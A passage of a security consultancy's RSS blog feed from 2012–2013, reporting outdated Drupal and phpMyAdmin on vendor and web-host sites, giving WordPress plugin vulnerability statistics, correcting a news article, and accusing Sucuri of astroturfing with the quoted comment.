				<content:encoded><![CDATA[<p>When it comes to internet security one of the most basic steps is keeping your software up to date. In sign of how poor the state of internet security is, even security companies are not taking such a basic step. The US website of Kaspersky Lab, which the New York Times has described as &#8220;<a href="http://www.nytimes.com/2012/06/04/technology/cyberweapon-warning-from-kaspersky-a-computer-security-expert.html?pagewanted=all&amp;_r=0">Europe’s largest antivirus company</a>&#8220;, is running a very out of date version of Drupal:</p>
<p><a href="http://www.whitefirdesign.com/blog/wp-content/uploads/2013/04/kaspersky-lab-us-website-drupal-version.png"><img class="aligncenter size-full wp-image-1594" alt="Kaspersky Lab US Website is Running Drupal 6.19" src="http://www.whitefirdesign.com/blog/wp-content/uploads/2013/04/kaspersky-lab-us-website-drupal-version.png" width="500" height="150" /></a></p>
<p>Kaspersky Lab has failed to update the software for over two years, the next version Drupal 6.20 was <a href="http://drupal.org/drupal-6.20">released</a> back in December of 2010, and they have missed the <a href="http://drupal.org/drupal-7.2">last</a> <a href="http://drupal.org/drupal-7.12">4</a> <a href="http://drupal.org/drupal-7.18">security</a> <a href="http://drupal.org/drupal-7.19">updates</a>. Updating between versions of Drupal 6 is relatively easy, so there isn&#8217;t any excuse for a tech company not being able to keep it up to date.</p>
<p>Kaspersky Lab is not alone in this, last year we <a title="Panda Security Still Fails to Take Basic Security Measure Months After Being Hacked" href="http://www.whitefirdesign.com/blog/2012/06/28/panda-security-still-fails-to-take-basic-security-measure-months-after-being-hacked/">posted</a> about Panda Security&#8217;s failure to update software running their websites even after some of their websites had been hacked.</p>
<p>You can check if Drupal websites you visit are keeping the software up to date with our Drupal Version check extension for <a href="https://chrome.google.com/webstore/detail/cfgkoondhklepebjanihdiedjmibieii">Chrome</a> and <a href="https://addons.mozilla.org/firefox/addon/drupal-version-check/">Firefox</a>.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.whitefirdesign.com/blog/2013/04/12/kaspersky-labs-us-website-running-outdated-and-insecure-version-of-drupal/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	<creativeCommons:license>http://creativecommons.org/licenses/by-nc-sa/3.0/us/</creativeCommons:license>
	</item>
		<item>
		<title>1&amp;1 Running Nearly Seven Years Out of Date Version of phpMyAdmin</title>
		<link>http://www.whitefirdesign.com/blog/2012/09/24/11-running-nearly-seven-years-out-of-date-version-of-phpmyadmin/</link>
		<comments>http://www.whitefirdesign.com/blog/2012/09/24/11-running-nearly-seven-years-out-of-date-version-of-phpmyadmin/#comments</comments>
		<pubDate>Mon, 24 Sep 2012 19:55:22 +0000</pubDate>
		<dc:creator>White Fir Design</dc:creator>
				<category><![CDATA[Website Security]]></category>

		<guid isPermaLink="false">http://www.whitefirdesign.com/blog/?p=1567</guid>
		<description><![CDATA[Two weeks ago we posted about FatCow was running an over six years out of date version of phpMyAdmin on their servers. In the post we mentioned that was the most out of date software we had seen in a &#8230; <a href="http://www.whitefirdesign.com/blog/2012/09/24/11-running-nearly-seven-years-out-of-date-version-of-phpmyadmin/">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
				<content:encoded><![CDATA[<p>Two weeks ago we posted about <a title="FatCow Running Over Six Years Out of Date Version of phpMyAdmin" href="http://www.whitefirdesign.com/blog/2012/09/10/fatcow-running-over-six-years-out-of-date-version-of-phpmyadmin/">FatCow was running an over six years out of date version of phpMyAdmin on their servers</a>. In the post we mentioned that was the most out of date software we had seen in a long time, but that dubious distinction has now been taken by 1&amp;1 and the nearly sevens years out of date <a href="https://phpmyadmin.1and1.com/Documentation.html">version of phpMyAdmin they use</a>. They are running phpMyAdmin 2.6.4-pl3, which was released on October 22, 2005. The subsequent version, a security update, was released on November 15, 2005.</p>
<p>1&amp;1 tells their customers it is important to <a href="http://faq.1and1.com/scripting_languages_supported/malware/14.html">keep software up to date to avoid being hacked</a>:</p>
<blockquote><p>One way to avoid attacks, is to make sure to keep your programs<br />
and scripts up-to-date. Check regularly for security warnings and<br />
make sure to install security patches as they become available.</p></blockquote>
<p>They obviously don&#8217;t listen to their own advice, but they do <a href="http://faq.1and1.com/scripting_languages_supported/malware/22.html">claim that they do</a>:</p>
<blockquote><p>1&amp;1 system administrators work hard to make sure that our 1&amp;1 servers are protected from known vulnerabilities by keeping all programs and services up-to-date with.</p></blockquote>
<p>phpMyAdmin provides a page that provides a listing of <a href="http://www.phpmyadmin.net/home_page/security/">all security announcements for the software</a> (something that other software developers should also be providing). In 2005, there were three serious security vulnerabilities found that probably impact the version of phpMyAdmin 1&amp;1 is running. The version probably contains most, if not all, of the 16 serious severity security issues and 1 considered &#8220;quite dangerous&#8221; fixed in 2006 and 2007, that we counted that impact in the version used FatCow. And the version probably contains more vulnerabilities that were fixed in later years.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.whitefirdesign.com/blog/2012/09/24/11-running-nearly-seven-years-out-of-date-version-of-phpmyadmin/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	<creativeCommons:license>http://creativecommons.org/licenses/by-nc-sa/3.0/us/</creativeCommons:license>
	</item>
		<item>
		<title>FatCow Running Over Six Years Out of Date Version of phpMyAdmin</title>
		<link>http://www.whitefirdesign.com/blog/2012/09/10/fatcow-running-over-six-years-out-of-date-version-of-phpmyadmin/</link>
		<comments>http://www.whitefirdesign.com/blog/2012/09/10/fatcow-running-over-six-years-out-of-date-version-of-phpmyadmin/#comments</comments>
		<pubDate>Mon, 10 Sep 2012 21:31:58 +0000</pubDate>
		<dc:creator>White Fir Design</dc:creator>
				<category><![CDATA[Website Security]]></category>

		<guid isPermaLink="false">http://www.whitefirdesign.com/blog/?p=1550</guid>
		<description><![CDATA[One of the most basic measures for keeping websites secure is to keep software running the website up to date, this is something that web hosts know and tell their customers. Unfortunately, many web host don&#8217;t seem to feel that &#8230; <a href="http://www.whitefirdesign.com/blog/2012/09/10/fatcow-running-over-six-years-out-of-date-version-of-phpmyadmin/">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
				<content:encoded><![CDATA[<p>One of the most basic measures for keeping websites secure is to keep software running the website up to date, this is something that web hosts know and tell their customers. Unfortunately, many web host don&#8217;t seem to feel that they need to heed their own advice and run out of date software on their servers. This put their clients at risk of being hacked though exploitation of a known vulnerability in that software. Their use of outdated software also a warning sign that they may not be handling the rest of the security properly as well.</p>
<p>When we do work on a client&#8217;s website we do a check of what version of some common software (PHP, MySQL, phpMyAdmin, etc.) is running of the server. This is partly so that we can see how well web hosts are doing at keeping that software up date and also so that we can alert the clients when severely out of date software is in use. We continue to see that in many cases web hosts&#8217; servers are running out of date versions of that common software, with known security vulnerabilities. The good news is that for most part we are seeing that the software is less out of date then it has been in the past. That made something we saw while checking a FatCow server in the past few days stick out. The server was using phpMyAdmin 2.8.0.1. That version was released on March 8 of 2006 and the next version, 2.8.0.2, was released eight days later. If over six years out of date hasn&#8217;t been the most out of date we have ever come across, it at least the most out of date we have seen in a long time.</p>
<p>phpMyAdmin provides a page that provides a listing of <a href="http://www.phpmyadmin.net/home_page/security/">all security announcements for the software</a> (something that other software developers should also be providing). Based on just the announcements for 2006 and 2007, the version of phpMyAdmin FatCow is using probably contains 16 serious severity security issues and 1 considered &#8220;quite dangerous&#8221;.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.whitefirdesign.com/blog/2012/09/10/fatcow-running-over-six-years-out-of-date-version-of-phpmyadmin/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	<creativeCommons:license>http://creativecommons.org/licenses/by-nc-sa/3.0/us/</creativeCommons:license>
	</item>
		<item>
		<title>Sucuri Security: How Not to Astroturf</title>
		<link>http://www.whitefirdesign.com/blog/2012/08/31/sucuri-security-how-not-to-astroturf/</link>
		<comments>http://www.whitefirdesign.com/blog/2012/08/31/sucuri-security-how-not-to-astroturf/#comments</comments>
		<pubDate>Fri, 31 Aug 2012 22:08:29 +0000</pubDate>
		<dc:creator>White Fir Design</dc:creator>
				<category><![CDATA[Sucuri Security]]></category>

		<guid isPermaLink="false">http://www.whitefirdesign.com/blog/?p=1535</guid>
		<description><![CDATA[A couple of months ago we wrote a post about someone who came to us after several tools had claimed their website was infected with malware. We found that not only were those tools wrong, but that the false positives &#8230; <a href="http://www.whitefirdesign.com/blog/2012/08/31/sucuri-security-how-not-to-astroturf/">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
				<content:encoded><![CDATA[<p>A couple of months ago we wrote a <a title="False Positives Highlight Deeply Flawed Website Malware Scanners" href="http://www.whitefirdesign.com/blog/2012/06/25/false-positives-highlight-deeply-flawed-website-malware-scanners/">post</a> about someone who came to us after several tools had claimed their website was infected with malware. We found that not only were those tools wrong, but that the false positives highlighted major flaws in these tools. One of them was <a title="False Positives Highlight Deeply Flawed Website Malware Scanners" href="http://www.whitefirdesign.com/blog/2012/06/25/false-positives-highlight-deeply-flawed-website-malware-scanners/#sucuri">Sucuri SiteCheck</a>, which we found was not bothering to actual scan a file labeled as malicious before falsely labeling the website as being infected. Since then there was an obvious attempt to get people to comment on the post, not on the substance of the post but with praise for Sucuri. We are happy to receive comments that further the discussion of a post, especially if they disagree with us. We are not interested in our blog being filled with off-topic comments and won&#8217;t approve them and you won&#8217;t see them. One of the comments we received during this was unlike any of the others, it was a long bizarre rant that had all the hallmarks of an attempted astroturfing by a Sucuri employee. It was later confirmed that this was an astroturfing attempt by Sucuri when the COO of Sucuri visited our website and contacted us using the same computer two weeks later. In our reply to them we mentioned the astroturfing, which they didn&#8217;t deny. We don&#8217;t know if this is a one-off attempt or if this is a common thing for Sucuri, but you should be on the lookout if you are reading something about them. You also have to wonder what other unethical actions Sucuri might also find acceptance to do.</p>
<p>The comment, which can be found in full at the <a href="#comment">bottom of the post</a>, is a good lesson on what not to do if you are going to attempt to astroturf. To start with the name you use shouldn&#8217;t be something that seems so obviously contrived like the name used in this instance, Intriqued Citizen. Then you would probably want to keep your comment short and to the point. Instead the comment was nearly three times longer than the section on Sucuri in the post itself. Would anyone spend that much time with something that they were not deeply involved in? Their comment also seemed quite obsessed with us competing with Sucuri, which doesn&#8217;t fit with what we were discussing in the post (nor does it fit with what we actually do). You also don&#8217;t want to use a computer that can be determined is from your organization. Most importantly, making a bizarre rant isn&#8217;t going to be the way to help you to win over people to your point of view, which is the point of astroturfing.</p>
<p>We are not going to put you through the misery of us analyzing the whole thing, but there were several things that stood out for us and are worth highlighting.</p>
<p>A good of example of the bizarre nature of the whole thing comes in their response to us stating the basic fact that JavaScript files should be scanned for malware when scanning a web page for malware:</p>
<blockquote><p>And this is based on what? Your extensive experience building malware scanners? Or wait, is it design? Oh no, maybe its Drupal? Oh, no, it must be publicly attacking every company that you disagree with. At least that what someone gets from reading your other nonsense posts.</p></blockquote>
<p>In the middle of not addressing at all the substance of what they are commenting on is a mention of Drupal, which comes completely out of left field. The blog post makes no mention of Drupal and the website discussed in the post was running WordPress (which can be surmised due to the first part of the post discussing a WordPress plugin). The rest of their comment doesn&#8217;t make any mention of Drupal either. We do run Drupal on parts of our website and provide services for Drupal (as we do for a variety of software), so maybe this is some sort of weird anti-Drupal bias? You might expect something like that from a kid, not from a self proclaimed C-level executive.</p>
<p>Another section claims that we use their service:</p>
<blockquote><p>Why don’t you post all your other findings of when you used it to clean your own clients sites. Come on, don’t lie, you know you use it.</p></blockquote>
<p>We have never used Sucuri to clean up a hacked website, as we actually do our own work. We have seen the shoddy work they do, so it would also be unethical for us to have ever outsourced the work to them. On a fairly regular basis we have people come to us to clean up a website that Sucuri had previously been hired to clean up, but had been reinfected after their initial cleanup (and in some instances after they did multiple cleanups). There are certainly reasons for that which would not be Sucuri&#8217;s fault, but in all of the instances we have dealt with basic parts of a proper cleanup had not been done by Sucuri. This included not doing the most important, but also the most time consuming and difficult, part of a cleanup. We don&#8217;t know if this is due to them offering to cleanup websites without knowing how to properly clean them up or if they are choosing to cut corners (they could probably get away with that in many instances), but would you really want to deal with a company that does either one? This is something we will expand on in a follow up post, as Sucuri certainly isn&#8217;t alone in not properly cleaning up hacked websites.</p>
<h2 id="comment">Full Comment From Intriqued Citizen (aka Sucuri&#8217;s COO):</h2>
<p>Wow, so you have obviously put in a lot of effort to get this word out to every one you can as I am seeing this on a number of search engines and Facebook. Either you love them, you are genuinely trying to get the word out, or you&#8217;re simply trying to tarnish their reputation by putting out a post that really says nothing. Which is it?</p>
<p>So let&#8217;s look at your post:</p>
<blockquote><p>What appears to have happened is that Sucuri automatically flagged the code based on their signature without actually scanning the JavaScript file for malicious code, which, if their scanner was reliable, would have determined that it was not malicious.</p></blockquote>
<p>Is this in fact what happened? Did you contact them? Did you ask the question or are you simply talking out of your rear? Did you try to understand how it works or simply look to benefit off their name?</p>
<p>Interesting comment here:</p>
<blockquote><p>That should be a basic part of scanning the page for malware even if it wasn’t in that odd location or part of a signature.</p></blockquote>
<p>And this is based on what? Your extensive experience building malware scanners? Or wait, is it design? Oh no, maybe its Drupal? Oh, no, it must be publicly attacking every company that you disagree with. At least that what someone gets from reading your other nonsense posts.</p>
<p>Then there is this:</p>
<blockquote><p>When you don’t actually scan things for malware before falsely identifying them as malware, you really shouldn’t be calling what you do website malware scanning.</p></blockquote>
<p>So instead, your recommendation is that they sign up with you? So it appears you&#8217;re a competitor or at least trying to play with the big dogs, no? Why would I choose to go with you over Sucuri has a stellar reputation and you have a&#8230; umm.. who are you again? Oh that&#8217;s right, the guy that bashes everyone and spends money on &#8230; umm.. ???</p>
<p>Oh, here is a juicy one:</p>
<blockquote><p>The more troubling aspect of this for their customers is the fact Sucuri’s idea of protecting websites is detecting that they already have been hacked and then cleaning them up.</p></blockquote>
<p>Really? That&#8217;s their idea? Odd, didn&#8217;t see that. Where did you see this? Or, again, are you talking out of your rear?</p>
<p>holy run on sentence batman:</p>
<blockquote><p>Putting aside the fact for the moment that properly secured websites are highly unlikely to be hacked and that allowing websites to be hacked has consequences even after they are clean again, with a scanner this poor it is unlikely that it will actually do a good job of detecting when website are infected.</p></blockquote>
<p>So, I&#8217;m confused, this sounds like opinion based around what? Your test of one site? Honest question, you think that&#8217;s a good objective test from a competitor? Why don&#8217;t you post all your other findings of when you used it to clean your own clients sites. Come on, don&#8217;t lie, you know you use it.</p>
<p>Alright, let&#8217;s look at all your even more ridiculous comments:</p>
<p>Your response to Buck:</p>
<blockquote><p>At that point it isn’t even actually a malware scanner.</p></blockquote>
<p>And this is again based on what? Your one test? Not very trustworthy assessment in my opinion, but what do I know.</p>
<blockquote><p>There is a big difference between perfection and not bothering to actually scan for malware with something claiming to be a malware scanner.</p></blockquote>
<p>Another empty statement with no facts.</p>
<blockquote><p>We actually know about security. Not the kind the kind that involves throwing around catchy phrases like “defense in depth” and “security is a process, not a state”, but the kind that deals with the real world.</p></blockquote>
<p>You do? Based on what? Your ability to detect software is out of date? Good job there turbo.</p>
<blockquote><p>If people do the things in the article that we linked to at the beginning of the post, then that will prevent the kinds of hacks that are actually causing the average website to be hacked.</p></blockquote>
<p>Are you serious? The crap in this post: http://www.whitefirdesign.com/resources/secure-your-website-from-hackers.html? You mean the same shit every other security company offers? Oh my you said sanitize all inputs to avoid SQL injections.. you rockstar you.. again, where was the real value in this post? I get more from reading http://sucuri.net/learn then I do from that post. But maybe I missed the sheer genius that was going to keep me safe in all that high-level non sense.</p>
<blockquote><p>(There is more that security community can do to improve security beyond that, but unfortunately many of them are instead focused on pushing products and services that don’t fix the real problems.)</p></blockquote>
<p>Oh, like this post and every other one that references your <strong>services</strong> section? Like that you mean?</p>
<blockquote><p>The solution to this isn’t for people to spend money on an unreliable malware scanner or even a malware scanner that works perfectly. At best a malware scanner would tell you that the website is infected after it already has been infected.</p></blockquote>
<p>Got it, so if I understand correctly, what you&#8217;re saying is, you don&#8217;t need a car alarm or a house alarm. As long as you don&#8217;t forget to lock the doors, get a blot lock, use a bolt lock on your steering wheel? Is that about right? Just want to make sure I understand this statement.</p>
<blockquote><p>At that point you need to clean up the infection and secure the website to make sure the infection doesn’t reoccur. We think it is better to secure the website before it can be infected.</p></blockquote>
<p>Oh but wait, based on what you said, there is no need to clean them up. They should be hardened to prevent this, so suck it up. No?</p>
<p>Your responses to Shaza:</p>
<blockquote><p>The rest of your comment actually shows that Sucuri is reactionary and not preventative. They only fixed the TimThumb vulnerability on your websiteafter you were hacked.</p></blockquote>
<p>Awkward, sounds like they only signed up after they were infected. If that&#8217;s the case, how would they have cleared the TimThumb issue? Is that what they did? Do you know, or are you talking out of your rear, again?</p>
<blockquote><p>If you want to pay someone to keep your website secure (and we never suggested you should or shouldn’t do that), then you should find someone who actually does the things that keep websites secure instead of hiring a company that uses a faulty malware scanner to attempt to detect that websites are already infected with malware as you are with Sucuri.</p></blockquote>
<p>Are you serious here? Did you really just say in your last comment not to go with people that push service or product but then push your own? Come on, that&#8217;s just retarded bud</p>
<blockquote><p>If Sucuri was actually interested in keeping WordPress based websites secure, instead of profiting off them remaining vulnerable, you have to wonder why they haven’t had an effort to get the issues with unresolved plugin security vulnerabilities fixed.</p></blockquote>
<p>Do you work for them? How do you know they haven&#8217;t or aren&#8217;t? That&#8217;s odd.. : /</p>
<p>Now, let&#8217;s see how big your balls are and if you&#8217;re really serious about bringing this issue to people&#8217;s attention. Go ahead and approve this and respond and let&#8217;s have an honest conversation. Not doing so will simply show how much of a slime ball you are putting out false information with no real facts or anything of real value that any one should pay attention to.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.whitefirdesign.com/blog/2012/08/31/sucuri-security-how-not-to-astroturf/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
	<creativeCommons:license>http://creativecommons.org/licenses/by-nc-sa/3.0/us/</creativeCommons:license>
	</item>
		<item>
		<title>2012 2nd Quarter WordPress Plugin Vulnerability Stats</title>
		<link>http://www.whitefirdesign.com/blog/2012/08/16/2012-2nd-quarter-wordpress-plugin-vulnerability-stats/</link>
		<comments>http://www.whitefirdesign.com/blog/2012/08/16/2012-2nd-quarter-wordpress-plugin-vulnerability-stats/#comments</comments>
		<pubDate>Thu, 16 Aug 2012 19:17:02 +0000</pubDate>
		<dc:creator>White Fir Design</dc:creator>
				<category><![CDATA[Website Security]]></category>
		<category><![CDATA[WordPress Plugins]]></category>

		<guid isPermaLink="false">http://www.whitefirdesign.com/blog/?p=1512</guid>
		<description><![CDATA[As part of our continued focus on the problems related to the security of WordPress plugins, last month we compiled some statistics on plugin vulnerabilities found during the second quarter of 2012. As they might be useful to others we &#8230; <a href="http://www.whitefirdesign.com/blog/2012/08/16/2012-2nd-quarter-wordpress-plugin-vulnerability-stats/">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
				<content:encoded><![CDATA[<p>As part of our continued focus on the problems related to the security of WordPress plugins, last month we compiled some statistics on plugin vulnerabilities found during the second quarter of 2012. As they might be useful to others we wanted to share them.</p>
<p>We used <a href="http://secunia.com/community/advisories/search/?search=wordpress">Secunia&#8217;s advisories</a> for our data set as their advisories include vulnerabilities discovered by the developers of the plugins and those discovered by others, which provides a good mix of data. Secunia reviews the reported vulnerabilities so their advisories do not include false reports of vulnerabilities that we find in other sources of vulnerability data.</p>
<p>It is important to keep in mind that the vulnerabilities found are not necessarily representative of what vulnerabilities remain in plugins. A lot of what determines what vulnerabilities are found is what kind people happened to look for or find.</p>
<p>A few more quick notes on the data: we have excluded a plugin that was not ever available in the WordPress.org plugin directory, the data was generated on July 16, and the numbers in the charts do not correlate with each other as some plugins had multiple vulnerabilities.</p>
<p>This chart shows the breakdown of the types of vulnerabilities found in the plugins:</p>
<p><a href="http://www.whitefirdesign.com/blog/wp-content/uploads/2012/08/wordpress-plugin-security-vulnerabilities.png"><img class="aligncenter size-full wp-image-1518" title="WordPress Plugin Security Vulnerabilities" src="http://www.whitefirdesign.com/blog/wp-content/uploads/2012/08/wordpress-plugin-security-vulnerabilities.png" alt="WordPress Plugin Security Vulnerabilities" width="570" height="380" /></a></p>
<p>The largest percentage were reflective cross-site scripting (XSS) vulnerabilities, which, while serious, are not a kind of that are likely to be used in an targeted hack of a website so they are not a major concern. The second largest group of vulnerabilities was unrestricted file upload vulnerabilities. This type of vulnerability can be easily exploited to place backdoor script on a website, which a hacker can then use to do pretty much anything on the website. Some may be familiar with the TimThumb vulnerability, which was this type of vulnerability. That so many unrestricted file upload vulnerabilities were found is a good reminder of need for plugins with file upload capabilities to be carefully scrutinized to insure that plugins with this type of vulnerability are not available in the plugin directory.</p>
<p>This chart shows the number of plugins with vulnerabilities that have been fixed and not fixed:</p>
<p><a href="http://www.whitefirdesign.com/blog/wp-content/uploads/2012/08/wordpress-plugins-fixed-or-not.png"><img class="aligncenter size-full wp-image-1523" title="WordPress Plugins Fixed or Not?" src="http://www.whitefirdesign.com/blog/wp-content/uploads/2012/08/wordpress-plugins-fixed-or-not.png" alt="WordPress Plugins Fixed or Not?" width="460" height="260" /></a></p>
<p>That over a quarter of the plugins have not fixed is troubling, but even worse is the types of vulnerabilities in those plugins:</p>
<p><a href="http://www.whitefirdesign.com/blog/wp-content/uploads/2012/08/wordpress-plugins-unresolved-security-vulnerabilities.png"><img class="aligncenter size-full wp-image-1520" title="WordPress Plugins Unresolved Security Vulnerabilities" src="http://www.whitefirdesign.com/blog/wp-content/uploads/2012/08/wordpress-plugins-unresolved-security-vulnerabilities.png" alt="" width="570" height="340" /></a></p>
<p>A third of those vulnerabilities are unrestricted file uploads. Not surprisingly due to the ease of exploitation and power granted, we have been seeing attempts to exploit the plugins found to have those vulnerabilities.</p>
<p>There is good news, plugins with unresolved security vulnerabilities are getting removed from the WordPress.org plugin directory, <a title="24 More WordPress Plugins With Publicly Known Vulnerabilities Were in Plugin Directory" href="http://www.whitefirdesign.com/blog/2012/03/15/24-more-wordpress-plugins-with-publicly-known-vulnerabilities-were-in-plugin-directory/">which had not always happened in the past</a>. That is partly due to our making sure that plugins with unresolved security vulnerabilities are reported to the people maintaining the plugin directory, so that they get properly handled. Removing the plugins does not help when the plugin is already installed and that is why <a href="http://wordpress.org/extend/ideas/topic/alert-when-installed-plugins-have-been-removed-from-the-plugin-directory">WordPress needs to provide alerts for removed plugins with unresolved security vulnerabilities</a>. In the mean time you can use our plugin <a href="http://wordpress.org/extend/plugins/no-longer-in-directory/">No Longer in Directory</a> to check if you are using plugins that have been removed. If a removed plugin has a Secunia advisory that will be linked to in the plugin&#8217;s report.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.whitefirdesign.com/blog/2012/08/16/2012-2nd-quarter-wordpress-plugin-vulnerability-stats/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	<creativeCommons:license>http://creativecommons.org/licenses/by-nc-sa/3.0/us/</creativeCommons:license>
	</item>
		<item>
		<title>SC Magazine Australia Blames WordPress Plugins for Unrelated Hack</title>
		<link>http://www.whitefirdesign.com/blog/2012/07/19/sc-magazine-australia-blames-wordpress-plugins-for-unrelated-hack/</link>
		<comments>http://www.whitefirdesign.com/blog/2012/07/19/sc-magazine-australia-blames-wordpress-plugins-for-unrelated-hack/#comments</comments>
		<pubDate>Thu, 19 Jul 2012 21:52:52 +0000</pubDate>
		<dc:creator>White Fir Design</dc:creator>
				<category><![CDATA[Bad Security]]></category>
		<category><![CDATA[WordPress Plugins]]></category>

		<guid isPermaLink="false">http://www.whitefirdesign.com/blog/?p=1498</guid>
		<description><![CDATA[SC Magazine Australia&#8217;s recent article &#8220;50,000 sites compromised in sustained attack&#8221; incorrectly claims that WordPress was associated with a past malware campaign and tries to link general security issues to WordPress. As we continue to see the harmful impact of &#8230; <a href="http://www.whitefirdesign.com/blog/2012/07/19/sc-magazine-australia-blames-wordpress-plugins-for-unrelated-hack/">Continue reading <span class="meta-nav">&#8594;</span></a>]]></description>
				<content:encoded><![CDATA[<p>SC Magazine Australia&#8217;s recent article &#8220;<a href="http://www.scmagazine.com.au/News/308164,50000-sites-compromised-in-sustained-attack.aspx">50,000 sites compromised in sustained attack</a>&#8221; incorrectly claims that WordPress was associated with a past malware campaign and tries to link general security issues to WordPress. As we continue to see the harmful impact of the bad security information, particularly when it involves WordPress, we want to clear up some of the claims in the article and fill in the critical missing information on actually protecting against security vulnerabilities in WordPress plugins.</p>
<p>The most blatant error in the article comes near the end of the article where it is stated that &#8220;Vulnerabilities in WordPress plugins have been long understood. Last year, large malware campaigns including the <a href="http://ddanchev.blogspot.com.au/2011/03/dissecting-massive-sql-injection-attack.html">LizaMoon attacks</a> exploited those holes&#8221; The LizaMoon attack was part of a <a title="The Hype Surrounding “Massive” Malware SQL Injections" href="http://www.whitefirdesign.com/blog/2011/04/05/the-hype-surrounding-massive-malware-sql-injections/">frequently hyped</a> multiyear campaign that targets ASP and ColdFusion based websites that have fairly basic SQL injection vulnerabilities. It had nothing to do with WordPress or any WordPress plugins. The link they provide about the LizaMoon attack makes no mention of WordPress and we are not aware of any source that ever claimed that it had a connection with WordPress. The rest of the article isn&#8217;t much better. Earlier it says:</p>
<blockquote><p>Attackers targeted holes in a string of plug-ins for blogging software — such as WordPress— including timthumb, uploadify and phpmyadmin.</p></blockquote>
<p>None of those things are themselves plugins for WordPress or other blogging software, nor is blogging software the only thing targeted by hackers. We probably deal with as many websites that are hacked due to outdated Joomla extensions as WordPress plugins, so there doesn&#8217;t appear to be a good reason to spotlight WordPress for special attention as the article did.</p>
<p><a href="http://www.phpmyadmin.net">phpMyAdmin</a> is web based administration tool for MySQL database. Several years ago there was WordPress plugin that added phpMyAdmin to WordPress which contained an exploitable vulnerability, but at this point it isn&#8217;t a major target of hackers as the plugin was removed back then. phpMyAdmin itself is frequently probed for on our website, so that is likely why phpMyAdmin would be listed as being targeted. That doesn&#8217;t explain why it be listed as a being a plugin for WordPress or other blogging software, though.</p>
<p>The TimThumb and Uploadify libraries are included in some WordPress plugins and those have been targeted (though since we last discussed <a title="Serious Security Vulnerabilities Recently Found in Numerous WordPress Plugins" href="http://www.whitefirdesign.com/blog/2012/06/19/serious-security-vulnerabilities-recently-found-in-numerous-wordpress-plugins/">recent serious security vulnerabilities in WordPress plugins</a> we have seen attackers expand from targeting just the recent Uploadify based vulnerabilities to the other upload vulnerabilities recently identified).</p>
<p>Later in the article it claims then claims that Plesk is being targeted (<a title="We Warned Media Temple About The Need to Keep Plesk Up to Date in 2010" href="http://www.whitefirdesign.com/blog/2012/02/27/we-warned-media-temple-about-the-need-to-keep-plesk-up-to-date-in-2010/">web hosts are not always good about keeping that up to date</a>), so it appears somebody involved in the article just threw together an incomplete list of software that gets targeted without any specific relation to the malware mentioned, while singling out WordPress.</p>
<p>Another worrisome aspect of the article is that it cites a &#8220;malware researcher&#8221; from Sucuri, the company that has a <a title="False Positives Highlight Deeply Flawed Website Malware Scanners" href="http://www.whitefirdesign.com/blog/2012/06/25/false-positives-highlight-deeply-flawed-website-malware-scanners/#sucuri">malware scanner that doesn&#8217;t actually bother to scan a website for malware before falsely flagging it</a>.</p>
<h2>Protecting Against WordPress Plugin Vulnerabilities</h2>
<p>What the article lacks, as stories about hacks often do, is any information on protecting websites from the vulnerabilities they are warning about. For WordPress plugin vulnerabilities, you would hope the answer is to update your plugins, as by the time a vulnerability is being exploited it should have already been patched. Unfortunately, in an analysis of WordPress plugin vulnerabilities in the second quarter of 2012, that we just did, we found that a fourth of the plugins had not been fixed (we will have a post with the full details of the analysis in the next few days). What makes this even worse is that most of the vulnerabilities in those plugins were serious vulnerabilities that are the most likely to lead to website being hacked. So what happens when plugins are not fixed?</p>
<p>When the maintainers of the WordPress.org Plugin Directory are made of aware of a security vulnerability in a plugin they will remove the plugin from the directory until it is fixed. Unfortunately, when we started looking into this earlier this year we found that many plugins had <a title="24 More WordPress Plugins With Publicly Known Vulnerabilities Were in Plugin Directory" href="http://www.whitefirdesign.com/blog/2012/03/15/24-more-wordpress-plugins-with-publicly-known-vulnerabilities-were-in-plugin-directory/">never been reported and had remained in the directory</a> including <a title="WordPress Plugin With Publicly Known Vulnerability Remained in Plugin Directory For Six Months" href="http://www.whitefirdesign.com/blog/2012/03/06/wordpress-plugin-with-publicly-known-vulnerability-remained-in-plugin-directory-for-six-months/">one in which hackers were attempting to exploit at the time</a>. Since then we have been making sure that any plugins with reports of unresolved security vulnerabilities are reported and appropriate action is taken (we have also been warning them about security issues that impact plugins, including notifying them about the recent <a title="Make Sure to Protect Against Serious Security Vulnerability in Magento" href="http://www.whitefirdesign.com/blog/2012/07/06/make-sure-to-protect-against-serious-security-vulnerability-in-magento/">Zend Framework vulnerability</a> that impacted several plugins). While removing the plugins until they are fixed prevents any additional websites from being exposed to the vulnerabilities, websites already using the plugins don&#8217;t receive any warning and remain vulnerable as we have <a title="WordPress Leaves Admins Unaware of Insecure Plugins on Their Websites" href="http://www.whitefirdesign.com/blog/2012/03/06/wordpress-leaves-admins-unaware-of-insecure-plugins-on-their-websites/">discussed before</a>. The <a href="http://wordpress.org/extend/ideas/topic/alert-when-installed-plugins-have-been-removed-from-the-plugin-directory#post-22481">process of adding alert in WordPress when plugins that have been removed from the Plugin Directory are installed has begun</a> and you can help to make sure it is given a high priority by <a title="Should WordPress Alert for Installed Plugins With Known Vulnerabilities?" href="http://www.whitefirdesign.com/blog/2012/07/02/should-wordpress-alert-for-installed-plugins-with-known-vulnerabilities/">voting for implementing that change</a>. Until an alert is added in WordPress itself, you can get a more limited version of this functionality using our <a href="http://wordpress.org/extend/plugins/no-longer-in-directory/">No Longer in Directory plugin</a> (we released update for the plugin, with new vulnerabilities, at the beginning of the week).</p>
]]></content:encoded>
			<wfw:commentRss>http://www.whitefirdesign.com/blog/2012/07/19/sc-magazine-australia-blames-wordpress-plugins-for-unrelated-hack/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	<creativeCommons:license>http://creativecommons.org/licenses/by-nc-sa/3.0/us/</creativeCommons:license>
	</item>
		<item>
		<title>Make Sure to Protect Against Serious Security Vulnerability in Magento</title>
